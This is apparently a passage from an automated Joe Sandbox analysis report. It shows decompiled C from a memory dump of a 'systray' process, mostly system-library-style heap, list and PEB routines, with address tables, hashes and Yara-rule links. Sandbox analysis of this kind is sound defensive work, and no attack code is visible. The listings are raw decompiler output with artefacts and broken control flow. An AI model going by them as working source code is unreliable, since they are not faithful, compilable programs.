				_t73 = L045B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E045DF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E045CA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x045d90af
0x045d90b8
0x045d90bb
0x045d90bf
0x045d90c2
0x045d90c2
0x045d90c8
0x045d90cb
0x045d90cd
0x046114d7
0x046114eb
0x046114eb
0x00000000
0x046114eb
0x046114db
0x046114e6
0x00000000
0x046114f2
0x046114e8
0x00000000
0x046114e8
0x045d90d8
0x045d90da
0x045d90dd
0x045d90e5
0x00000000
0x045d9139
0x045d90fa
0x045d90fe
0x045d9142
0x00000000
0x045d9142
0x045d9104
0x045d9107
0x045d910b
0x045d9110
0x045d9118
0x045d9147
0x045d9148
0x045d914f
0x045d9150
0x045d9151
0x045d9152
0x045d9156
0x045d915d
0x045d9160
0x045d9168
0x045d916c
0x045d91bc
0x045d91be
0x00000000
0x045d91be
0x045d916e
0x045d9173
0x045d9176
0x00000000
0x00000000
0x045d917c
0x045d9180
0x045d91b5
0x00000000
0x045d91b5
0x045d9182
0x045d9185
0x045d9189
0x00000000
0x00000000
0x045d918e
0x045d9190
0x045d9198
0x00000000
0x00000000
0x045d91a0
0x00000000
0x045d91ad
0x045d91ad
0x045d91b0
0x045d91b1
0x00000000
0x045d9185
0x045d911a
0x045d911c
0x045d911f
0x045d9125
0x045d9127
0x00000000

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: a7df7d1fca49aa55ead640afb8529e686a87618eb0fe2cd787e6fb4bdb423f57
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 19217FB1A00305EFDB30DF99C844AAAF7F8FF58714F14886AE945A7210E230B900DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0466070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0466070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E046607DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0465AFDE( &_v8,  &_v12);
					E04661293(_t38, _v28, _t60);
					if(E045B7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E046514FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0466071b
0x04660724
0x04660734
0x04660738
0x0466074b
0x0466074b
0x04660753
0x04660753
0x04660759
0x0466075d
0x04660774
0x04660779
0x0466077d
0x04660789
0x04660795
0x046607a7
0x04660797
0x046607a0
0x046607a0
0x046607af
0x046607c4
0x046607cd
0x046607cd
0x046607af
0x046607dc

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 47e01f63959a3773c7d090aaf5998c56b7a685603429b55069bd950eb02a96c8
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 12210436204200AFD705DF18C880BAABBA5FFD4350F04866DF9968B395E730ED09CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04599240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04599240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x466f708);
				E045ED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E045D95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E045D95D0();
				_t33 =  *0x46884c4; // 0x0
				L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x46884c4; // 0x0
				L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x46884c4; // 0x0
				E045B2280(L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x46886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E045D95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E045D95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04599325();
					_t50 =  *0x46884c4; // 0x0
					return E045ED0D1(L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x04599240
0x04599242
0x04599247
0x0459924c
0x0459924e
0x04599255
0x04599257
0x0459925a
0x0459925f
0x0459925f
0x04599266
0x04599271
0x04599276
0x04599279
0x0459927e
0x04599295
0x0459929a
0x045992b1
0x045992b6
0x045992d7
0x045992dc
0x045992e0
0x045992e6
0x045992e8
0x045992ee
0x04599332
0x04599333
0x04599337
0x04599338
0x0459933a
0x0459933a
0x0459933d
0x04599342
0x04599342
0x04599345
0x04599349
0x0459934e
0x04599352
0x04599357
0x045992f4
0x045992f4
0x045992f6
0x045992f9
0x04599300
0x04599306
0x04599324
0x04599324

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9123d6ea50d53e4e5ef545bbf795789d10e09308cc0d9d09cf8f00211b655e7
Instruction ID: 4a73483ce0a47e18ed4f32b566f744ae2ea78fed54ef89791f0f01e71c36949c
Opcode Fuzzy Hash: d9123d6ea50d53e4e5ef545bbf795789d10e09308cc0d9d09cf8f00211b655e7
Instruction Fuzzy Hash: 70213972040A41EFD725EF28CA00B59B7F9FF48708F54466CA049876A2D634F941EB84

Uniqueness

Uniqueness Score: -1.00%

Function 046146A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E046146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L045B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E045DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E045CD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L045B77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x046146b7
0x046146ba
0x046146c5
0x046146c8
0x046146d0
0x046146d4
0x046146e6
0x046146e9
0x046146f4
0x046146ff
0x04614705
0x04614706
0x0461470c
0x04614713
0x0461471b
0x04614723
0x04614725
0x046146d6
0x046146d9
0x046146db
0x046146db
0x04614732

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 5f90b77b30c08748bb7fa7e27d8e1b303aa1f80dd74317d8fd6b69742adf30b2
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 8B110272A04208BFD7119F6C98808BEB7B9FFD5304F10806AF984CB350DA319D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0462C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0462C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E045D9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E045D95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E045D95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E045D95D0();
				return L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0462c458
0x0462c45d
0x0462c466
0x0462c468
0x0462c469
0x0462c46a
0x0462c46b
0x0462c46e
0x0462c46f
0x0462c471
0x0462c476
0x0462c476
0x0462c47c
0x0462c47e
0x0462c480
0x0462c480
0x0462c483
0x0462c484
0x0462c486
0x0462c488
0x0462c48f
0x0462c491
0x0462c493
0x0462c493
0x0462c48f
0x0462c498
0x0462c49e
0x0462c4ad
0x0462c4ad
0x0462c4b2
0x0462c4b4
0x0462c4cd

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 4cd623ace2d8003bc6c8f4bacc3876cc620471d965128eb26cac63902b549c29
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: E20192B2140A16BFE721AF69CD80EA7FB6DFF94394F004525F15446660DB21BCA1DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 04599080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04599080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x46885ec;
				E045B2280(_t48, 0x46885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E045AFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x468538c; // 0x77ad6848
					if( *_t84 != 0x4685388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x466f6e8);
						E045ED0E8(0x46885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E046688F5(_t80, _t85, 0x4685388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x46886c0; // 0x4407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x46886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E045B2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E046688F5(0x46885ec, _t85, 0x4685388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E045DAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x468b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x46884c0;
																			if(_t82 >=  *0x46884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04669063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0459922A(_t99);
										_t64 = E045B7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04668B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x46886c0; // 0x4407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x46886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x46886bc;
													_t87 = 0x46886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04599240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x46886c4;
												_t87 = 0x46886c0;
												L27:
												E045C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E045ED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4685388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x468538c = _t51;
						goto L6;
					}
				}
			}

0x04599082
0x04599083
0x04599084
0x04599085
0x04599087
0x04599096
0x04599098
0x04599098
0x0459909e
0x045990a8
0x045990e7
0x045990e7
0x045990aa
0x045990b0
0x045990b7
0x045990bd
0x045990dd
0x045990e6
0x045990bf
0x045990bf
0x045990c7
0x045990cf
0x045990f1
0x045990f2
0x045990f4
0x045990f5
0x045990f6
0x045990f7
0x045990f8
0x045990f9
0x045990fa
0x045990fb
0x045990fc
0x045990fd
0x045990fe
0x045990ff
0x04599100
0x04599102
0x04599107
0x0459910c
0x04599110
0x04599113
0x04599115
0x04599136
0x0459913f
0x04599143
0x045f37e4
0x045f37e4
0x04599117
0x04599117
0x0459911d
0x00000000
0x0459911f
0x0459911f
0x04599125
0x00000000
0x04599127
0x0459912d
0x04599130
0x04599134
0x04599158
0x0459915d
0x04599161
0x04599168
0x045f3715
0x0459916e
0x0459916e
0x04599175
0x04599177
0x0459917e
0x0459917f
0x04599182
0x04599182
0x04599187
0x04599187
0x0459918a
0x0459918d
0x0459918f
0x04599192
0x04599195
0x04599198
0x04599198
0x04599198
0x0459919a
0x00000000
0x00000000
0x045f371f
0x045f3721
0x045f3727
0x045f372f
0x045f3733
0x045f3735
0x045f3738
0x045f373b
0x045f373d
0x045f3740
0x00000000
0x045f3746
0x045f3746
0x045f3749
0x00000000
0x045f374f
0x045f374f
0x045f3751
0x045f3757
0x045f3759
0x045f375c
0x045f375c
0x045f375e
0x045f375e
0x045f3761
0x045f3764
0x00000000
0x00000000
0x045f3766
0x045f3768
0x045f37a3
0x045f37a3
0x045f37a5
0x045f37a7
0x045f37ad
0x045f37b0
0x045f37b2
0x045f37bc
0x045f37c2
0x045f37c2
0x045f37b2
0x04599187
0x04599187
0x0459918a
0x0459918d
0x0459918f
0x04599192
0x04599195
0x00000000
0x04599195
0x00000000
0x045f376a
0x045f376a
0x045f376a
0x045f376c
0x045f376c
0x045f376f
0x045f3775
0x00000000
0x00000000
0x045f3777
0x045f3779
0x045f3782
0x045f3787
0x045f3789
0x045f3790
0x045f3790
0x045f378b
0x045f378b
0x045f378b
0x045f3792
0x045f3795
0x00000000
0x045f3795
0x00000000
0x045f3779
0x045f3798
0x00000000
0x045f3798
0x00000000
0x045f3768
0x045f379b
0x045f379b
0x045f3751
0x045f3749
0x00000000
0x045f3740
0x045991a0
0x045991a3
0x045991a9
0x045991b0
0x00000000
0x045991b0
0x04599187
0x045991b4
0x045991b4
0x045991bb
0x045991c0
0x045991c5
0x045991c7
0x045f37da
0x045991cd
0x045991cd
0x045991cd
0x045991d2
0x045991d5
0x04599239
0x04599239
0x045991d7
0x045991db
0x045991e1
0x045991e7
0x045991fd
0x04599203
0x0459921e
0x04599223
0x00000000
0x04599205
0x04599205
0x04599208
0x0459920c
0x04599214
0x04599214
0x0459920c
0x045991e9
0x045991e9
0x045991ee
0x045991f3
0x045991f3
0x045991f3
0x045991e7
0x00000000
0x00000000
0x00000000
0x04599134
0x04599125
0x0459911d
0x0459914e
0x045990d1
0x045990d1
0x045990d3
0x045990d6
0x045990d8
0x00000000
0x045990d8
0x045990cf

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83d0e1cf598a0c9b290e85c87c3d7161236b3a291489851e9492f94483b007a
Instruction ID: 427c648667bb263fd5b3cde9cdeb35fa8f0342989738478df56f61d8827f2bfc
Opcode Fuzzy Hash: c83d0e1cf598a0c9b290e85c87c3d7161236b3a291489851e9492f94483b007a
Instruction Fuzzy Hash: 0801F4B2601200AFE7149F04E840B15BBE9FF81324F21416EE111DB791E374FC41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 04664015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04664015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E045B2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E045B2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x46886ac);
					E0459F900(0x46886d4, _t28);
					E045AFFB0(0x46886ac, _t28, 0x46886ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E045AFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0466401a
0x0466401e
0x04664023
0x04664028
0x04664029
0x0466402b
0x0466402f
0x04664043
0x04664046
0x04664051
0x04664057
0x0466405f
0x04664062
0x04664067
0x0466406f
0x0466407c
0x0466407c
0x0466408c
0x0466408c
0x04664097

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05cea6e7eb4e2012484071212cfcf8441f712e83d9110ab3e762af356f49bfe6
Instruction ID: 2d12603ec4613854e4ef17ebb0d542ddf539de87443681adc178c95cc8f555ba
Opcode Fuzzy Hash: 05cea6e7eb4e2012484071212cfcf8441f712e83d9110ab3e762af356f49bfe6
Instruction Fuzzy Hash: 0001DF722019467FE610BF69CD84E57B7ACFF89668B000629F508C7A11DB24FC11CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 046514FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E046514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x468d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E045DFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E045B7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E045DB640(E045D9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x046514fb
0x046514fb
0x0465150a
0x04651514
0x04651519
0x0465151b
0x04651526
0x0465152c
0x04651534
0x04651537
0x0465153a
0x04651545
0x04651557
0x04651547
0x04651550
0x04651550
0x04651562
0x04651563
0x04651565
0x0465156a
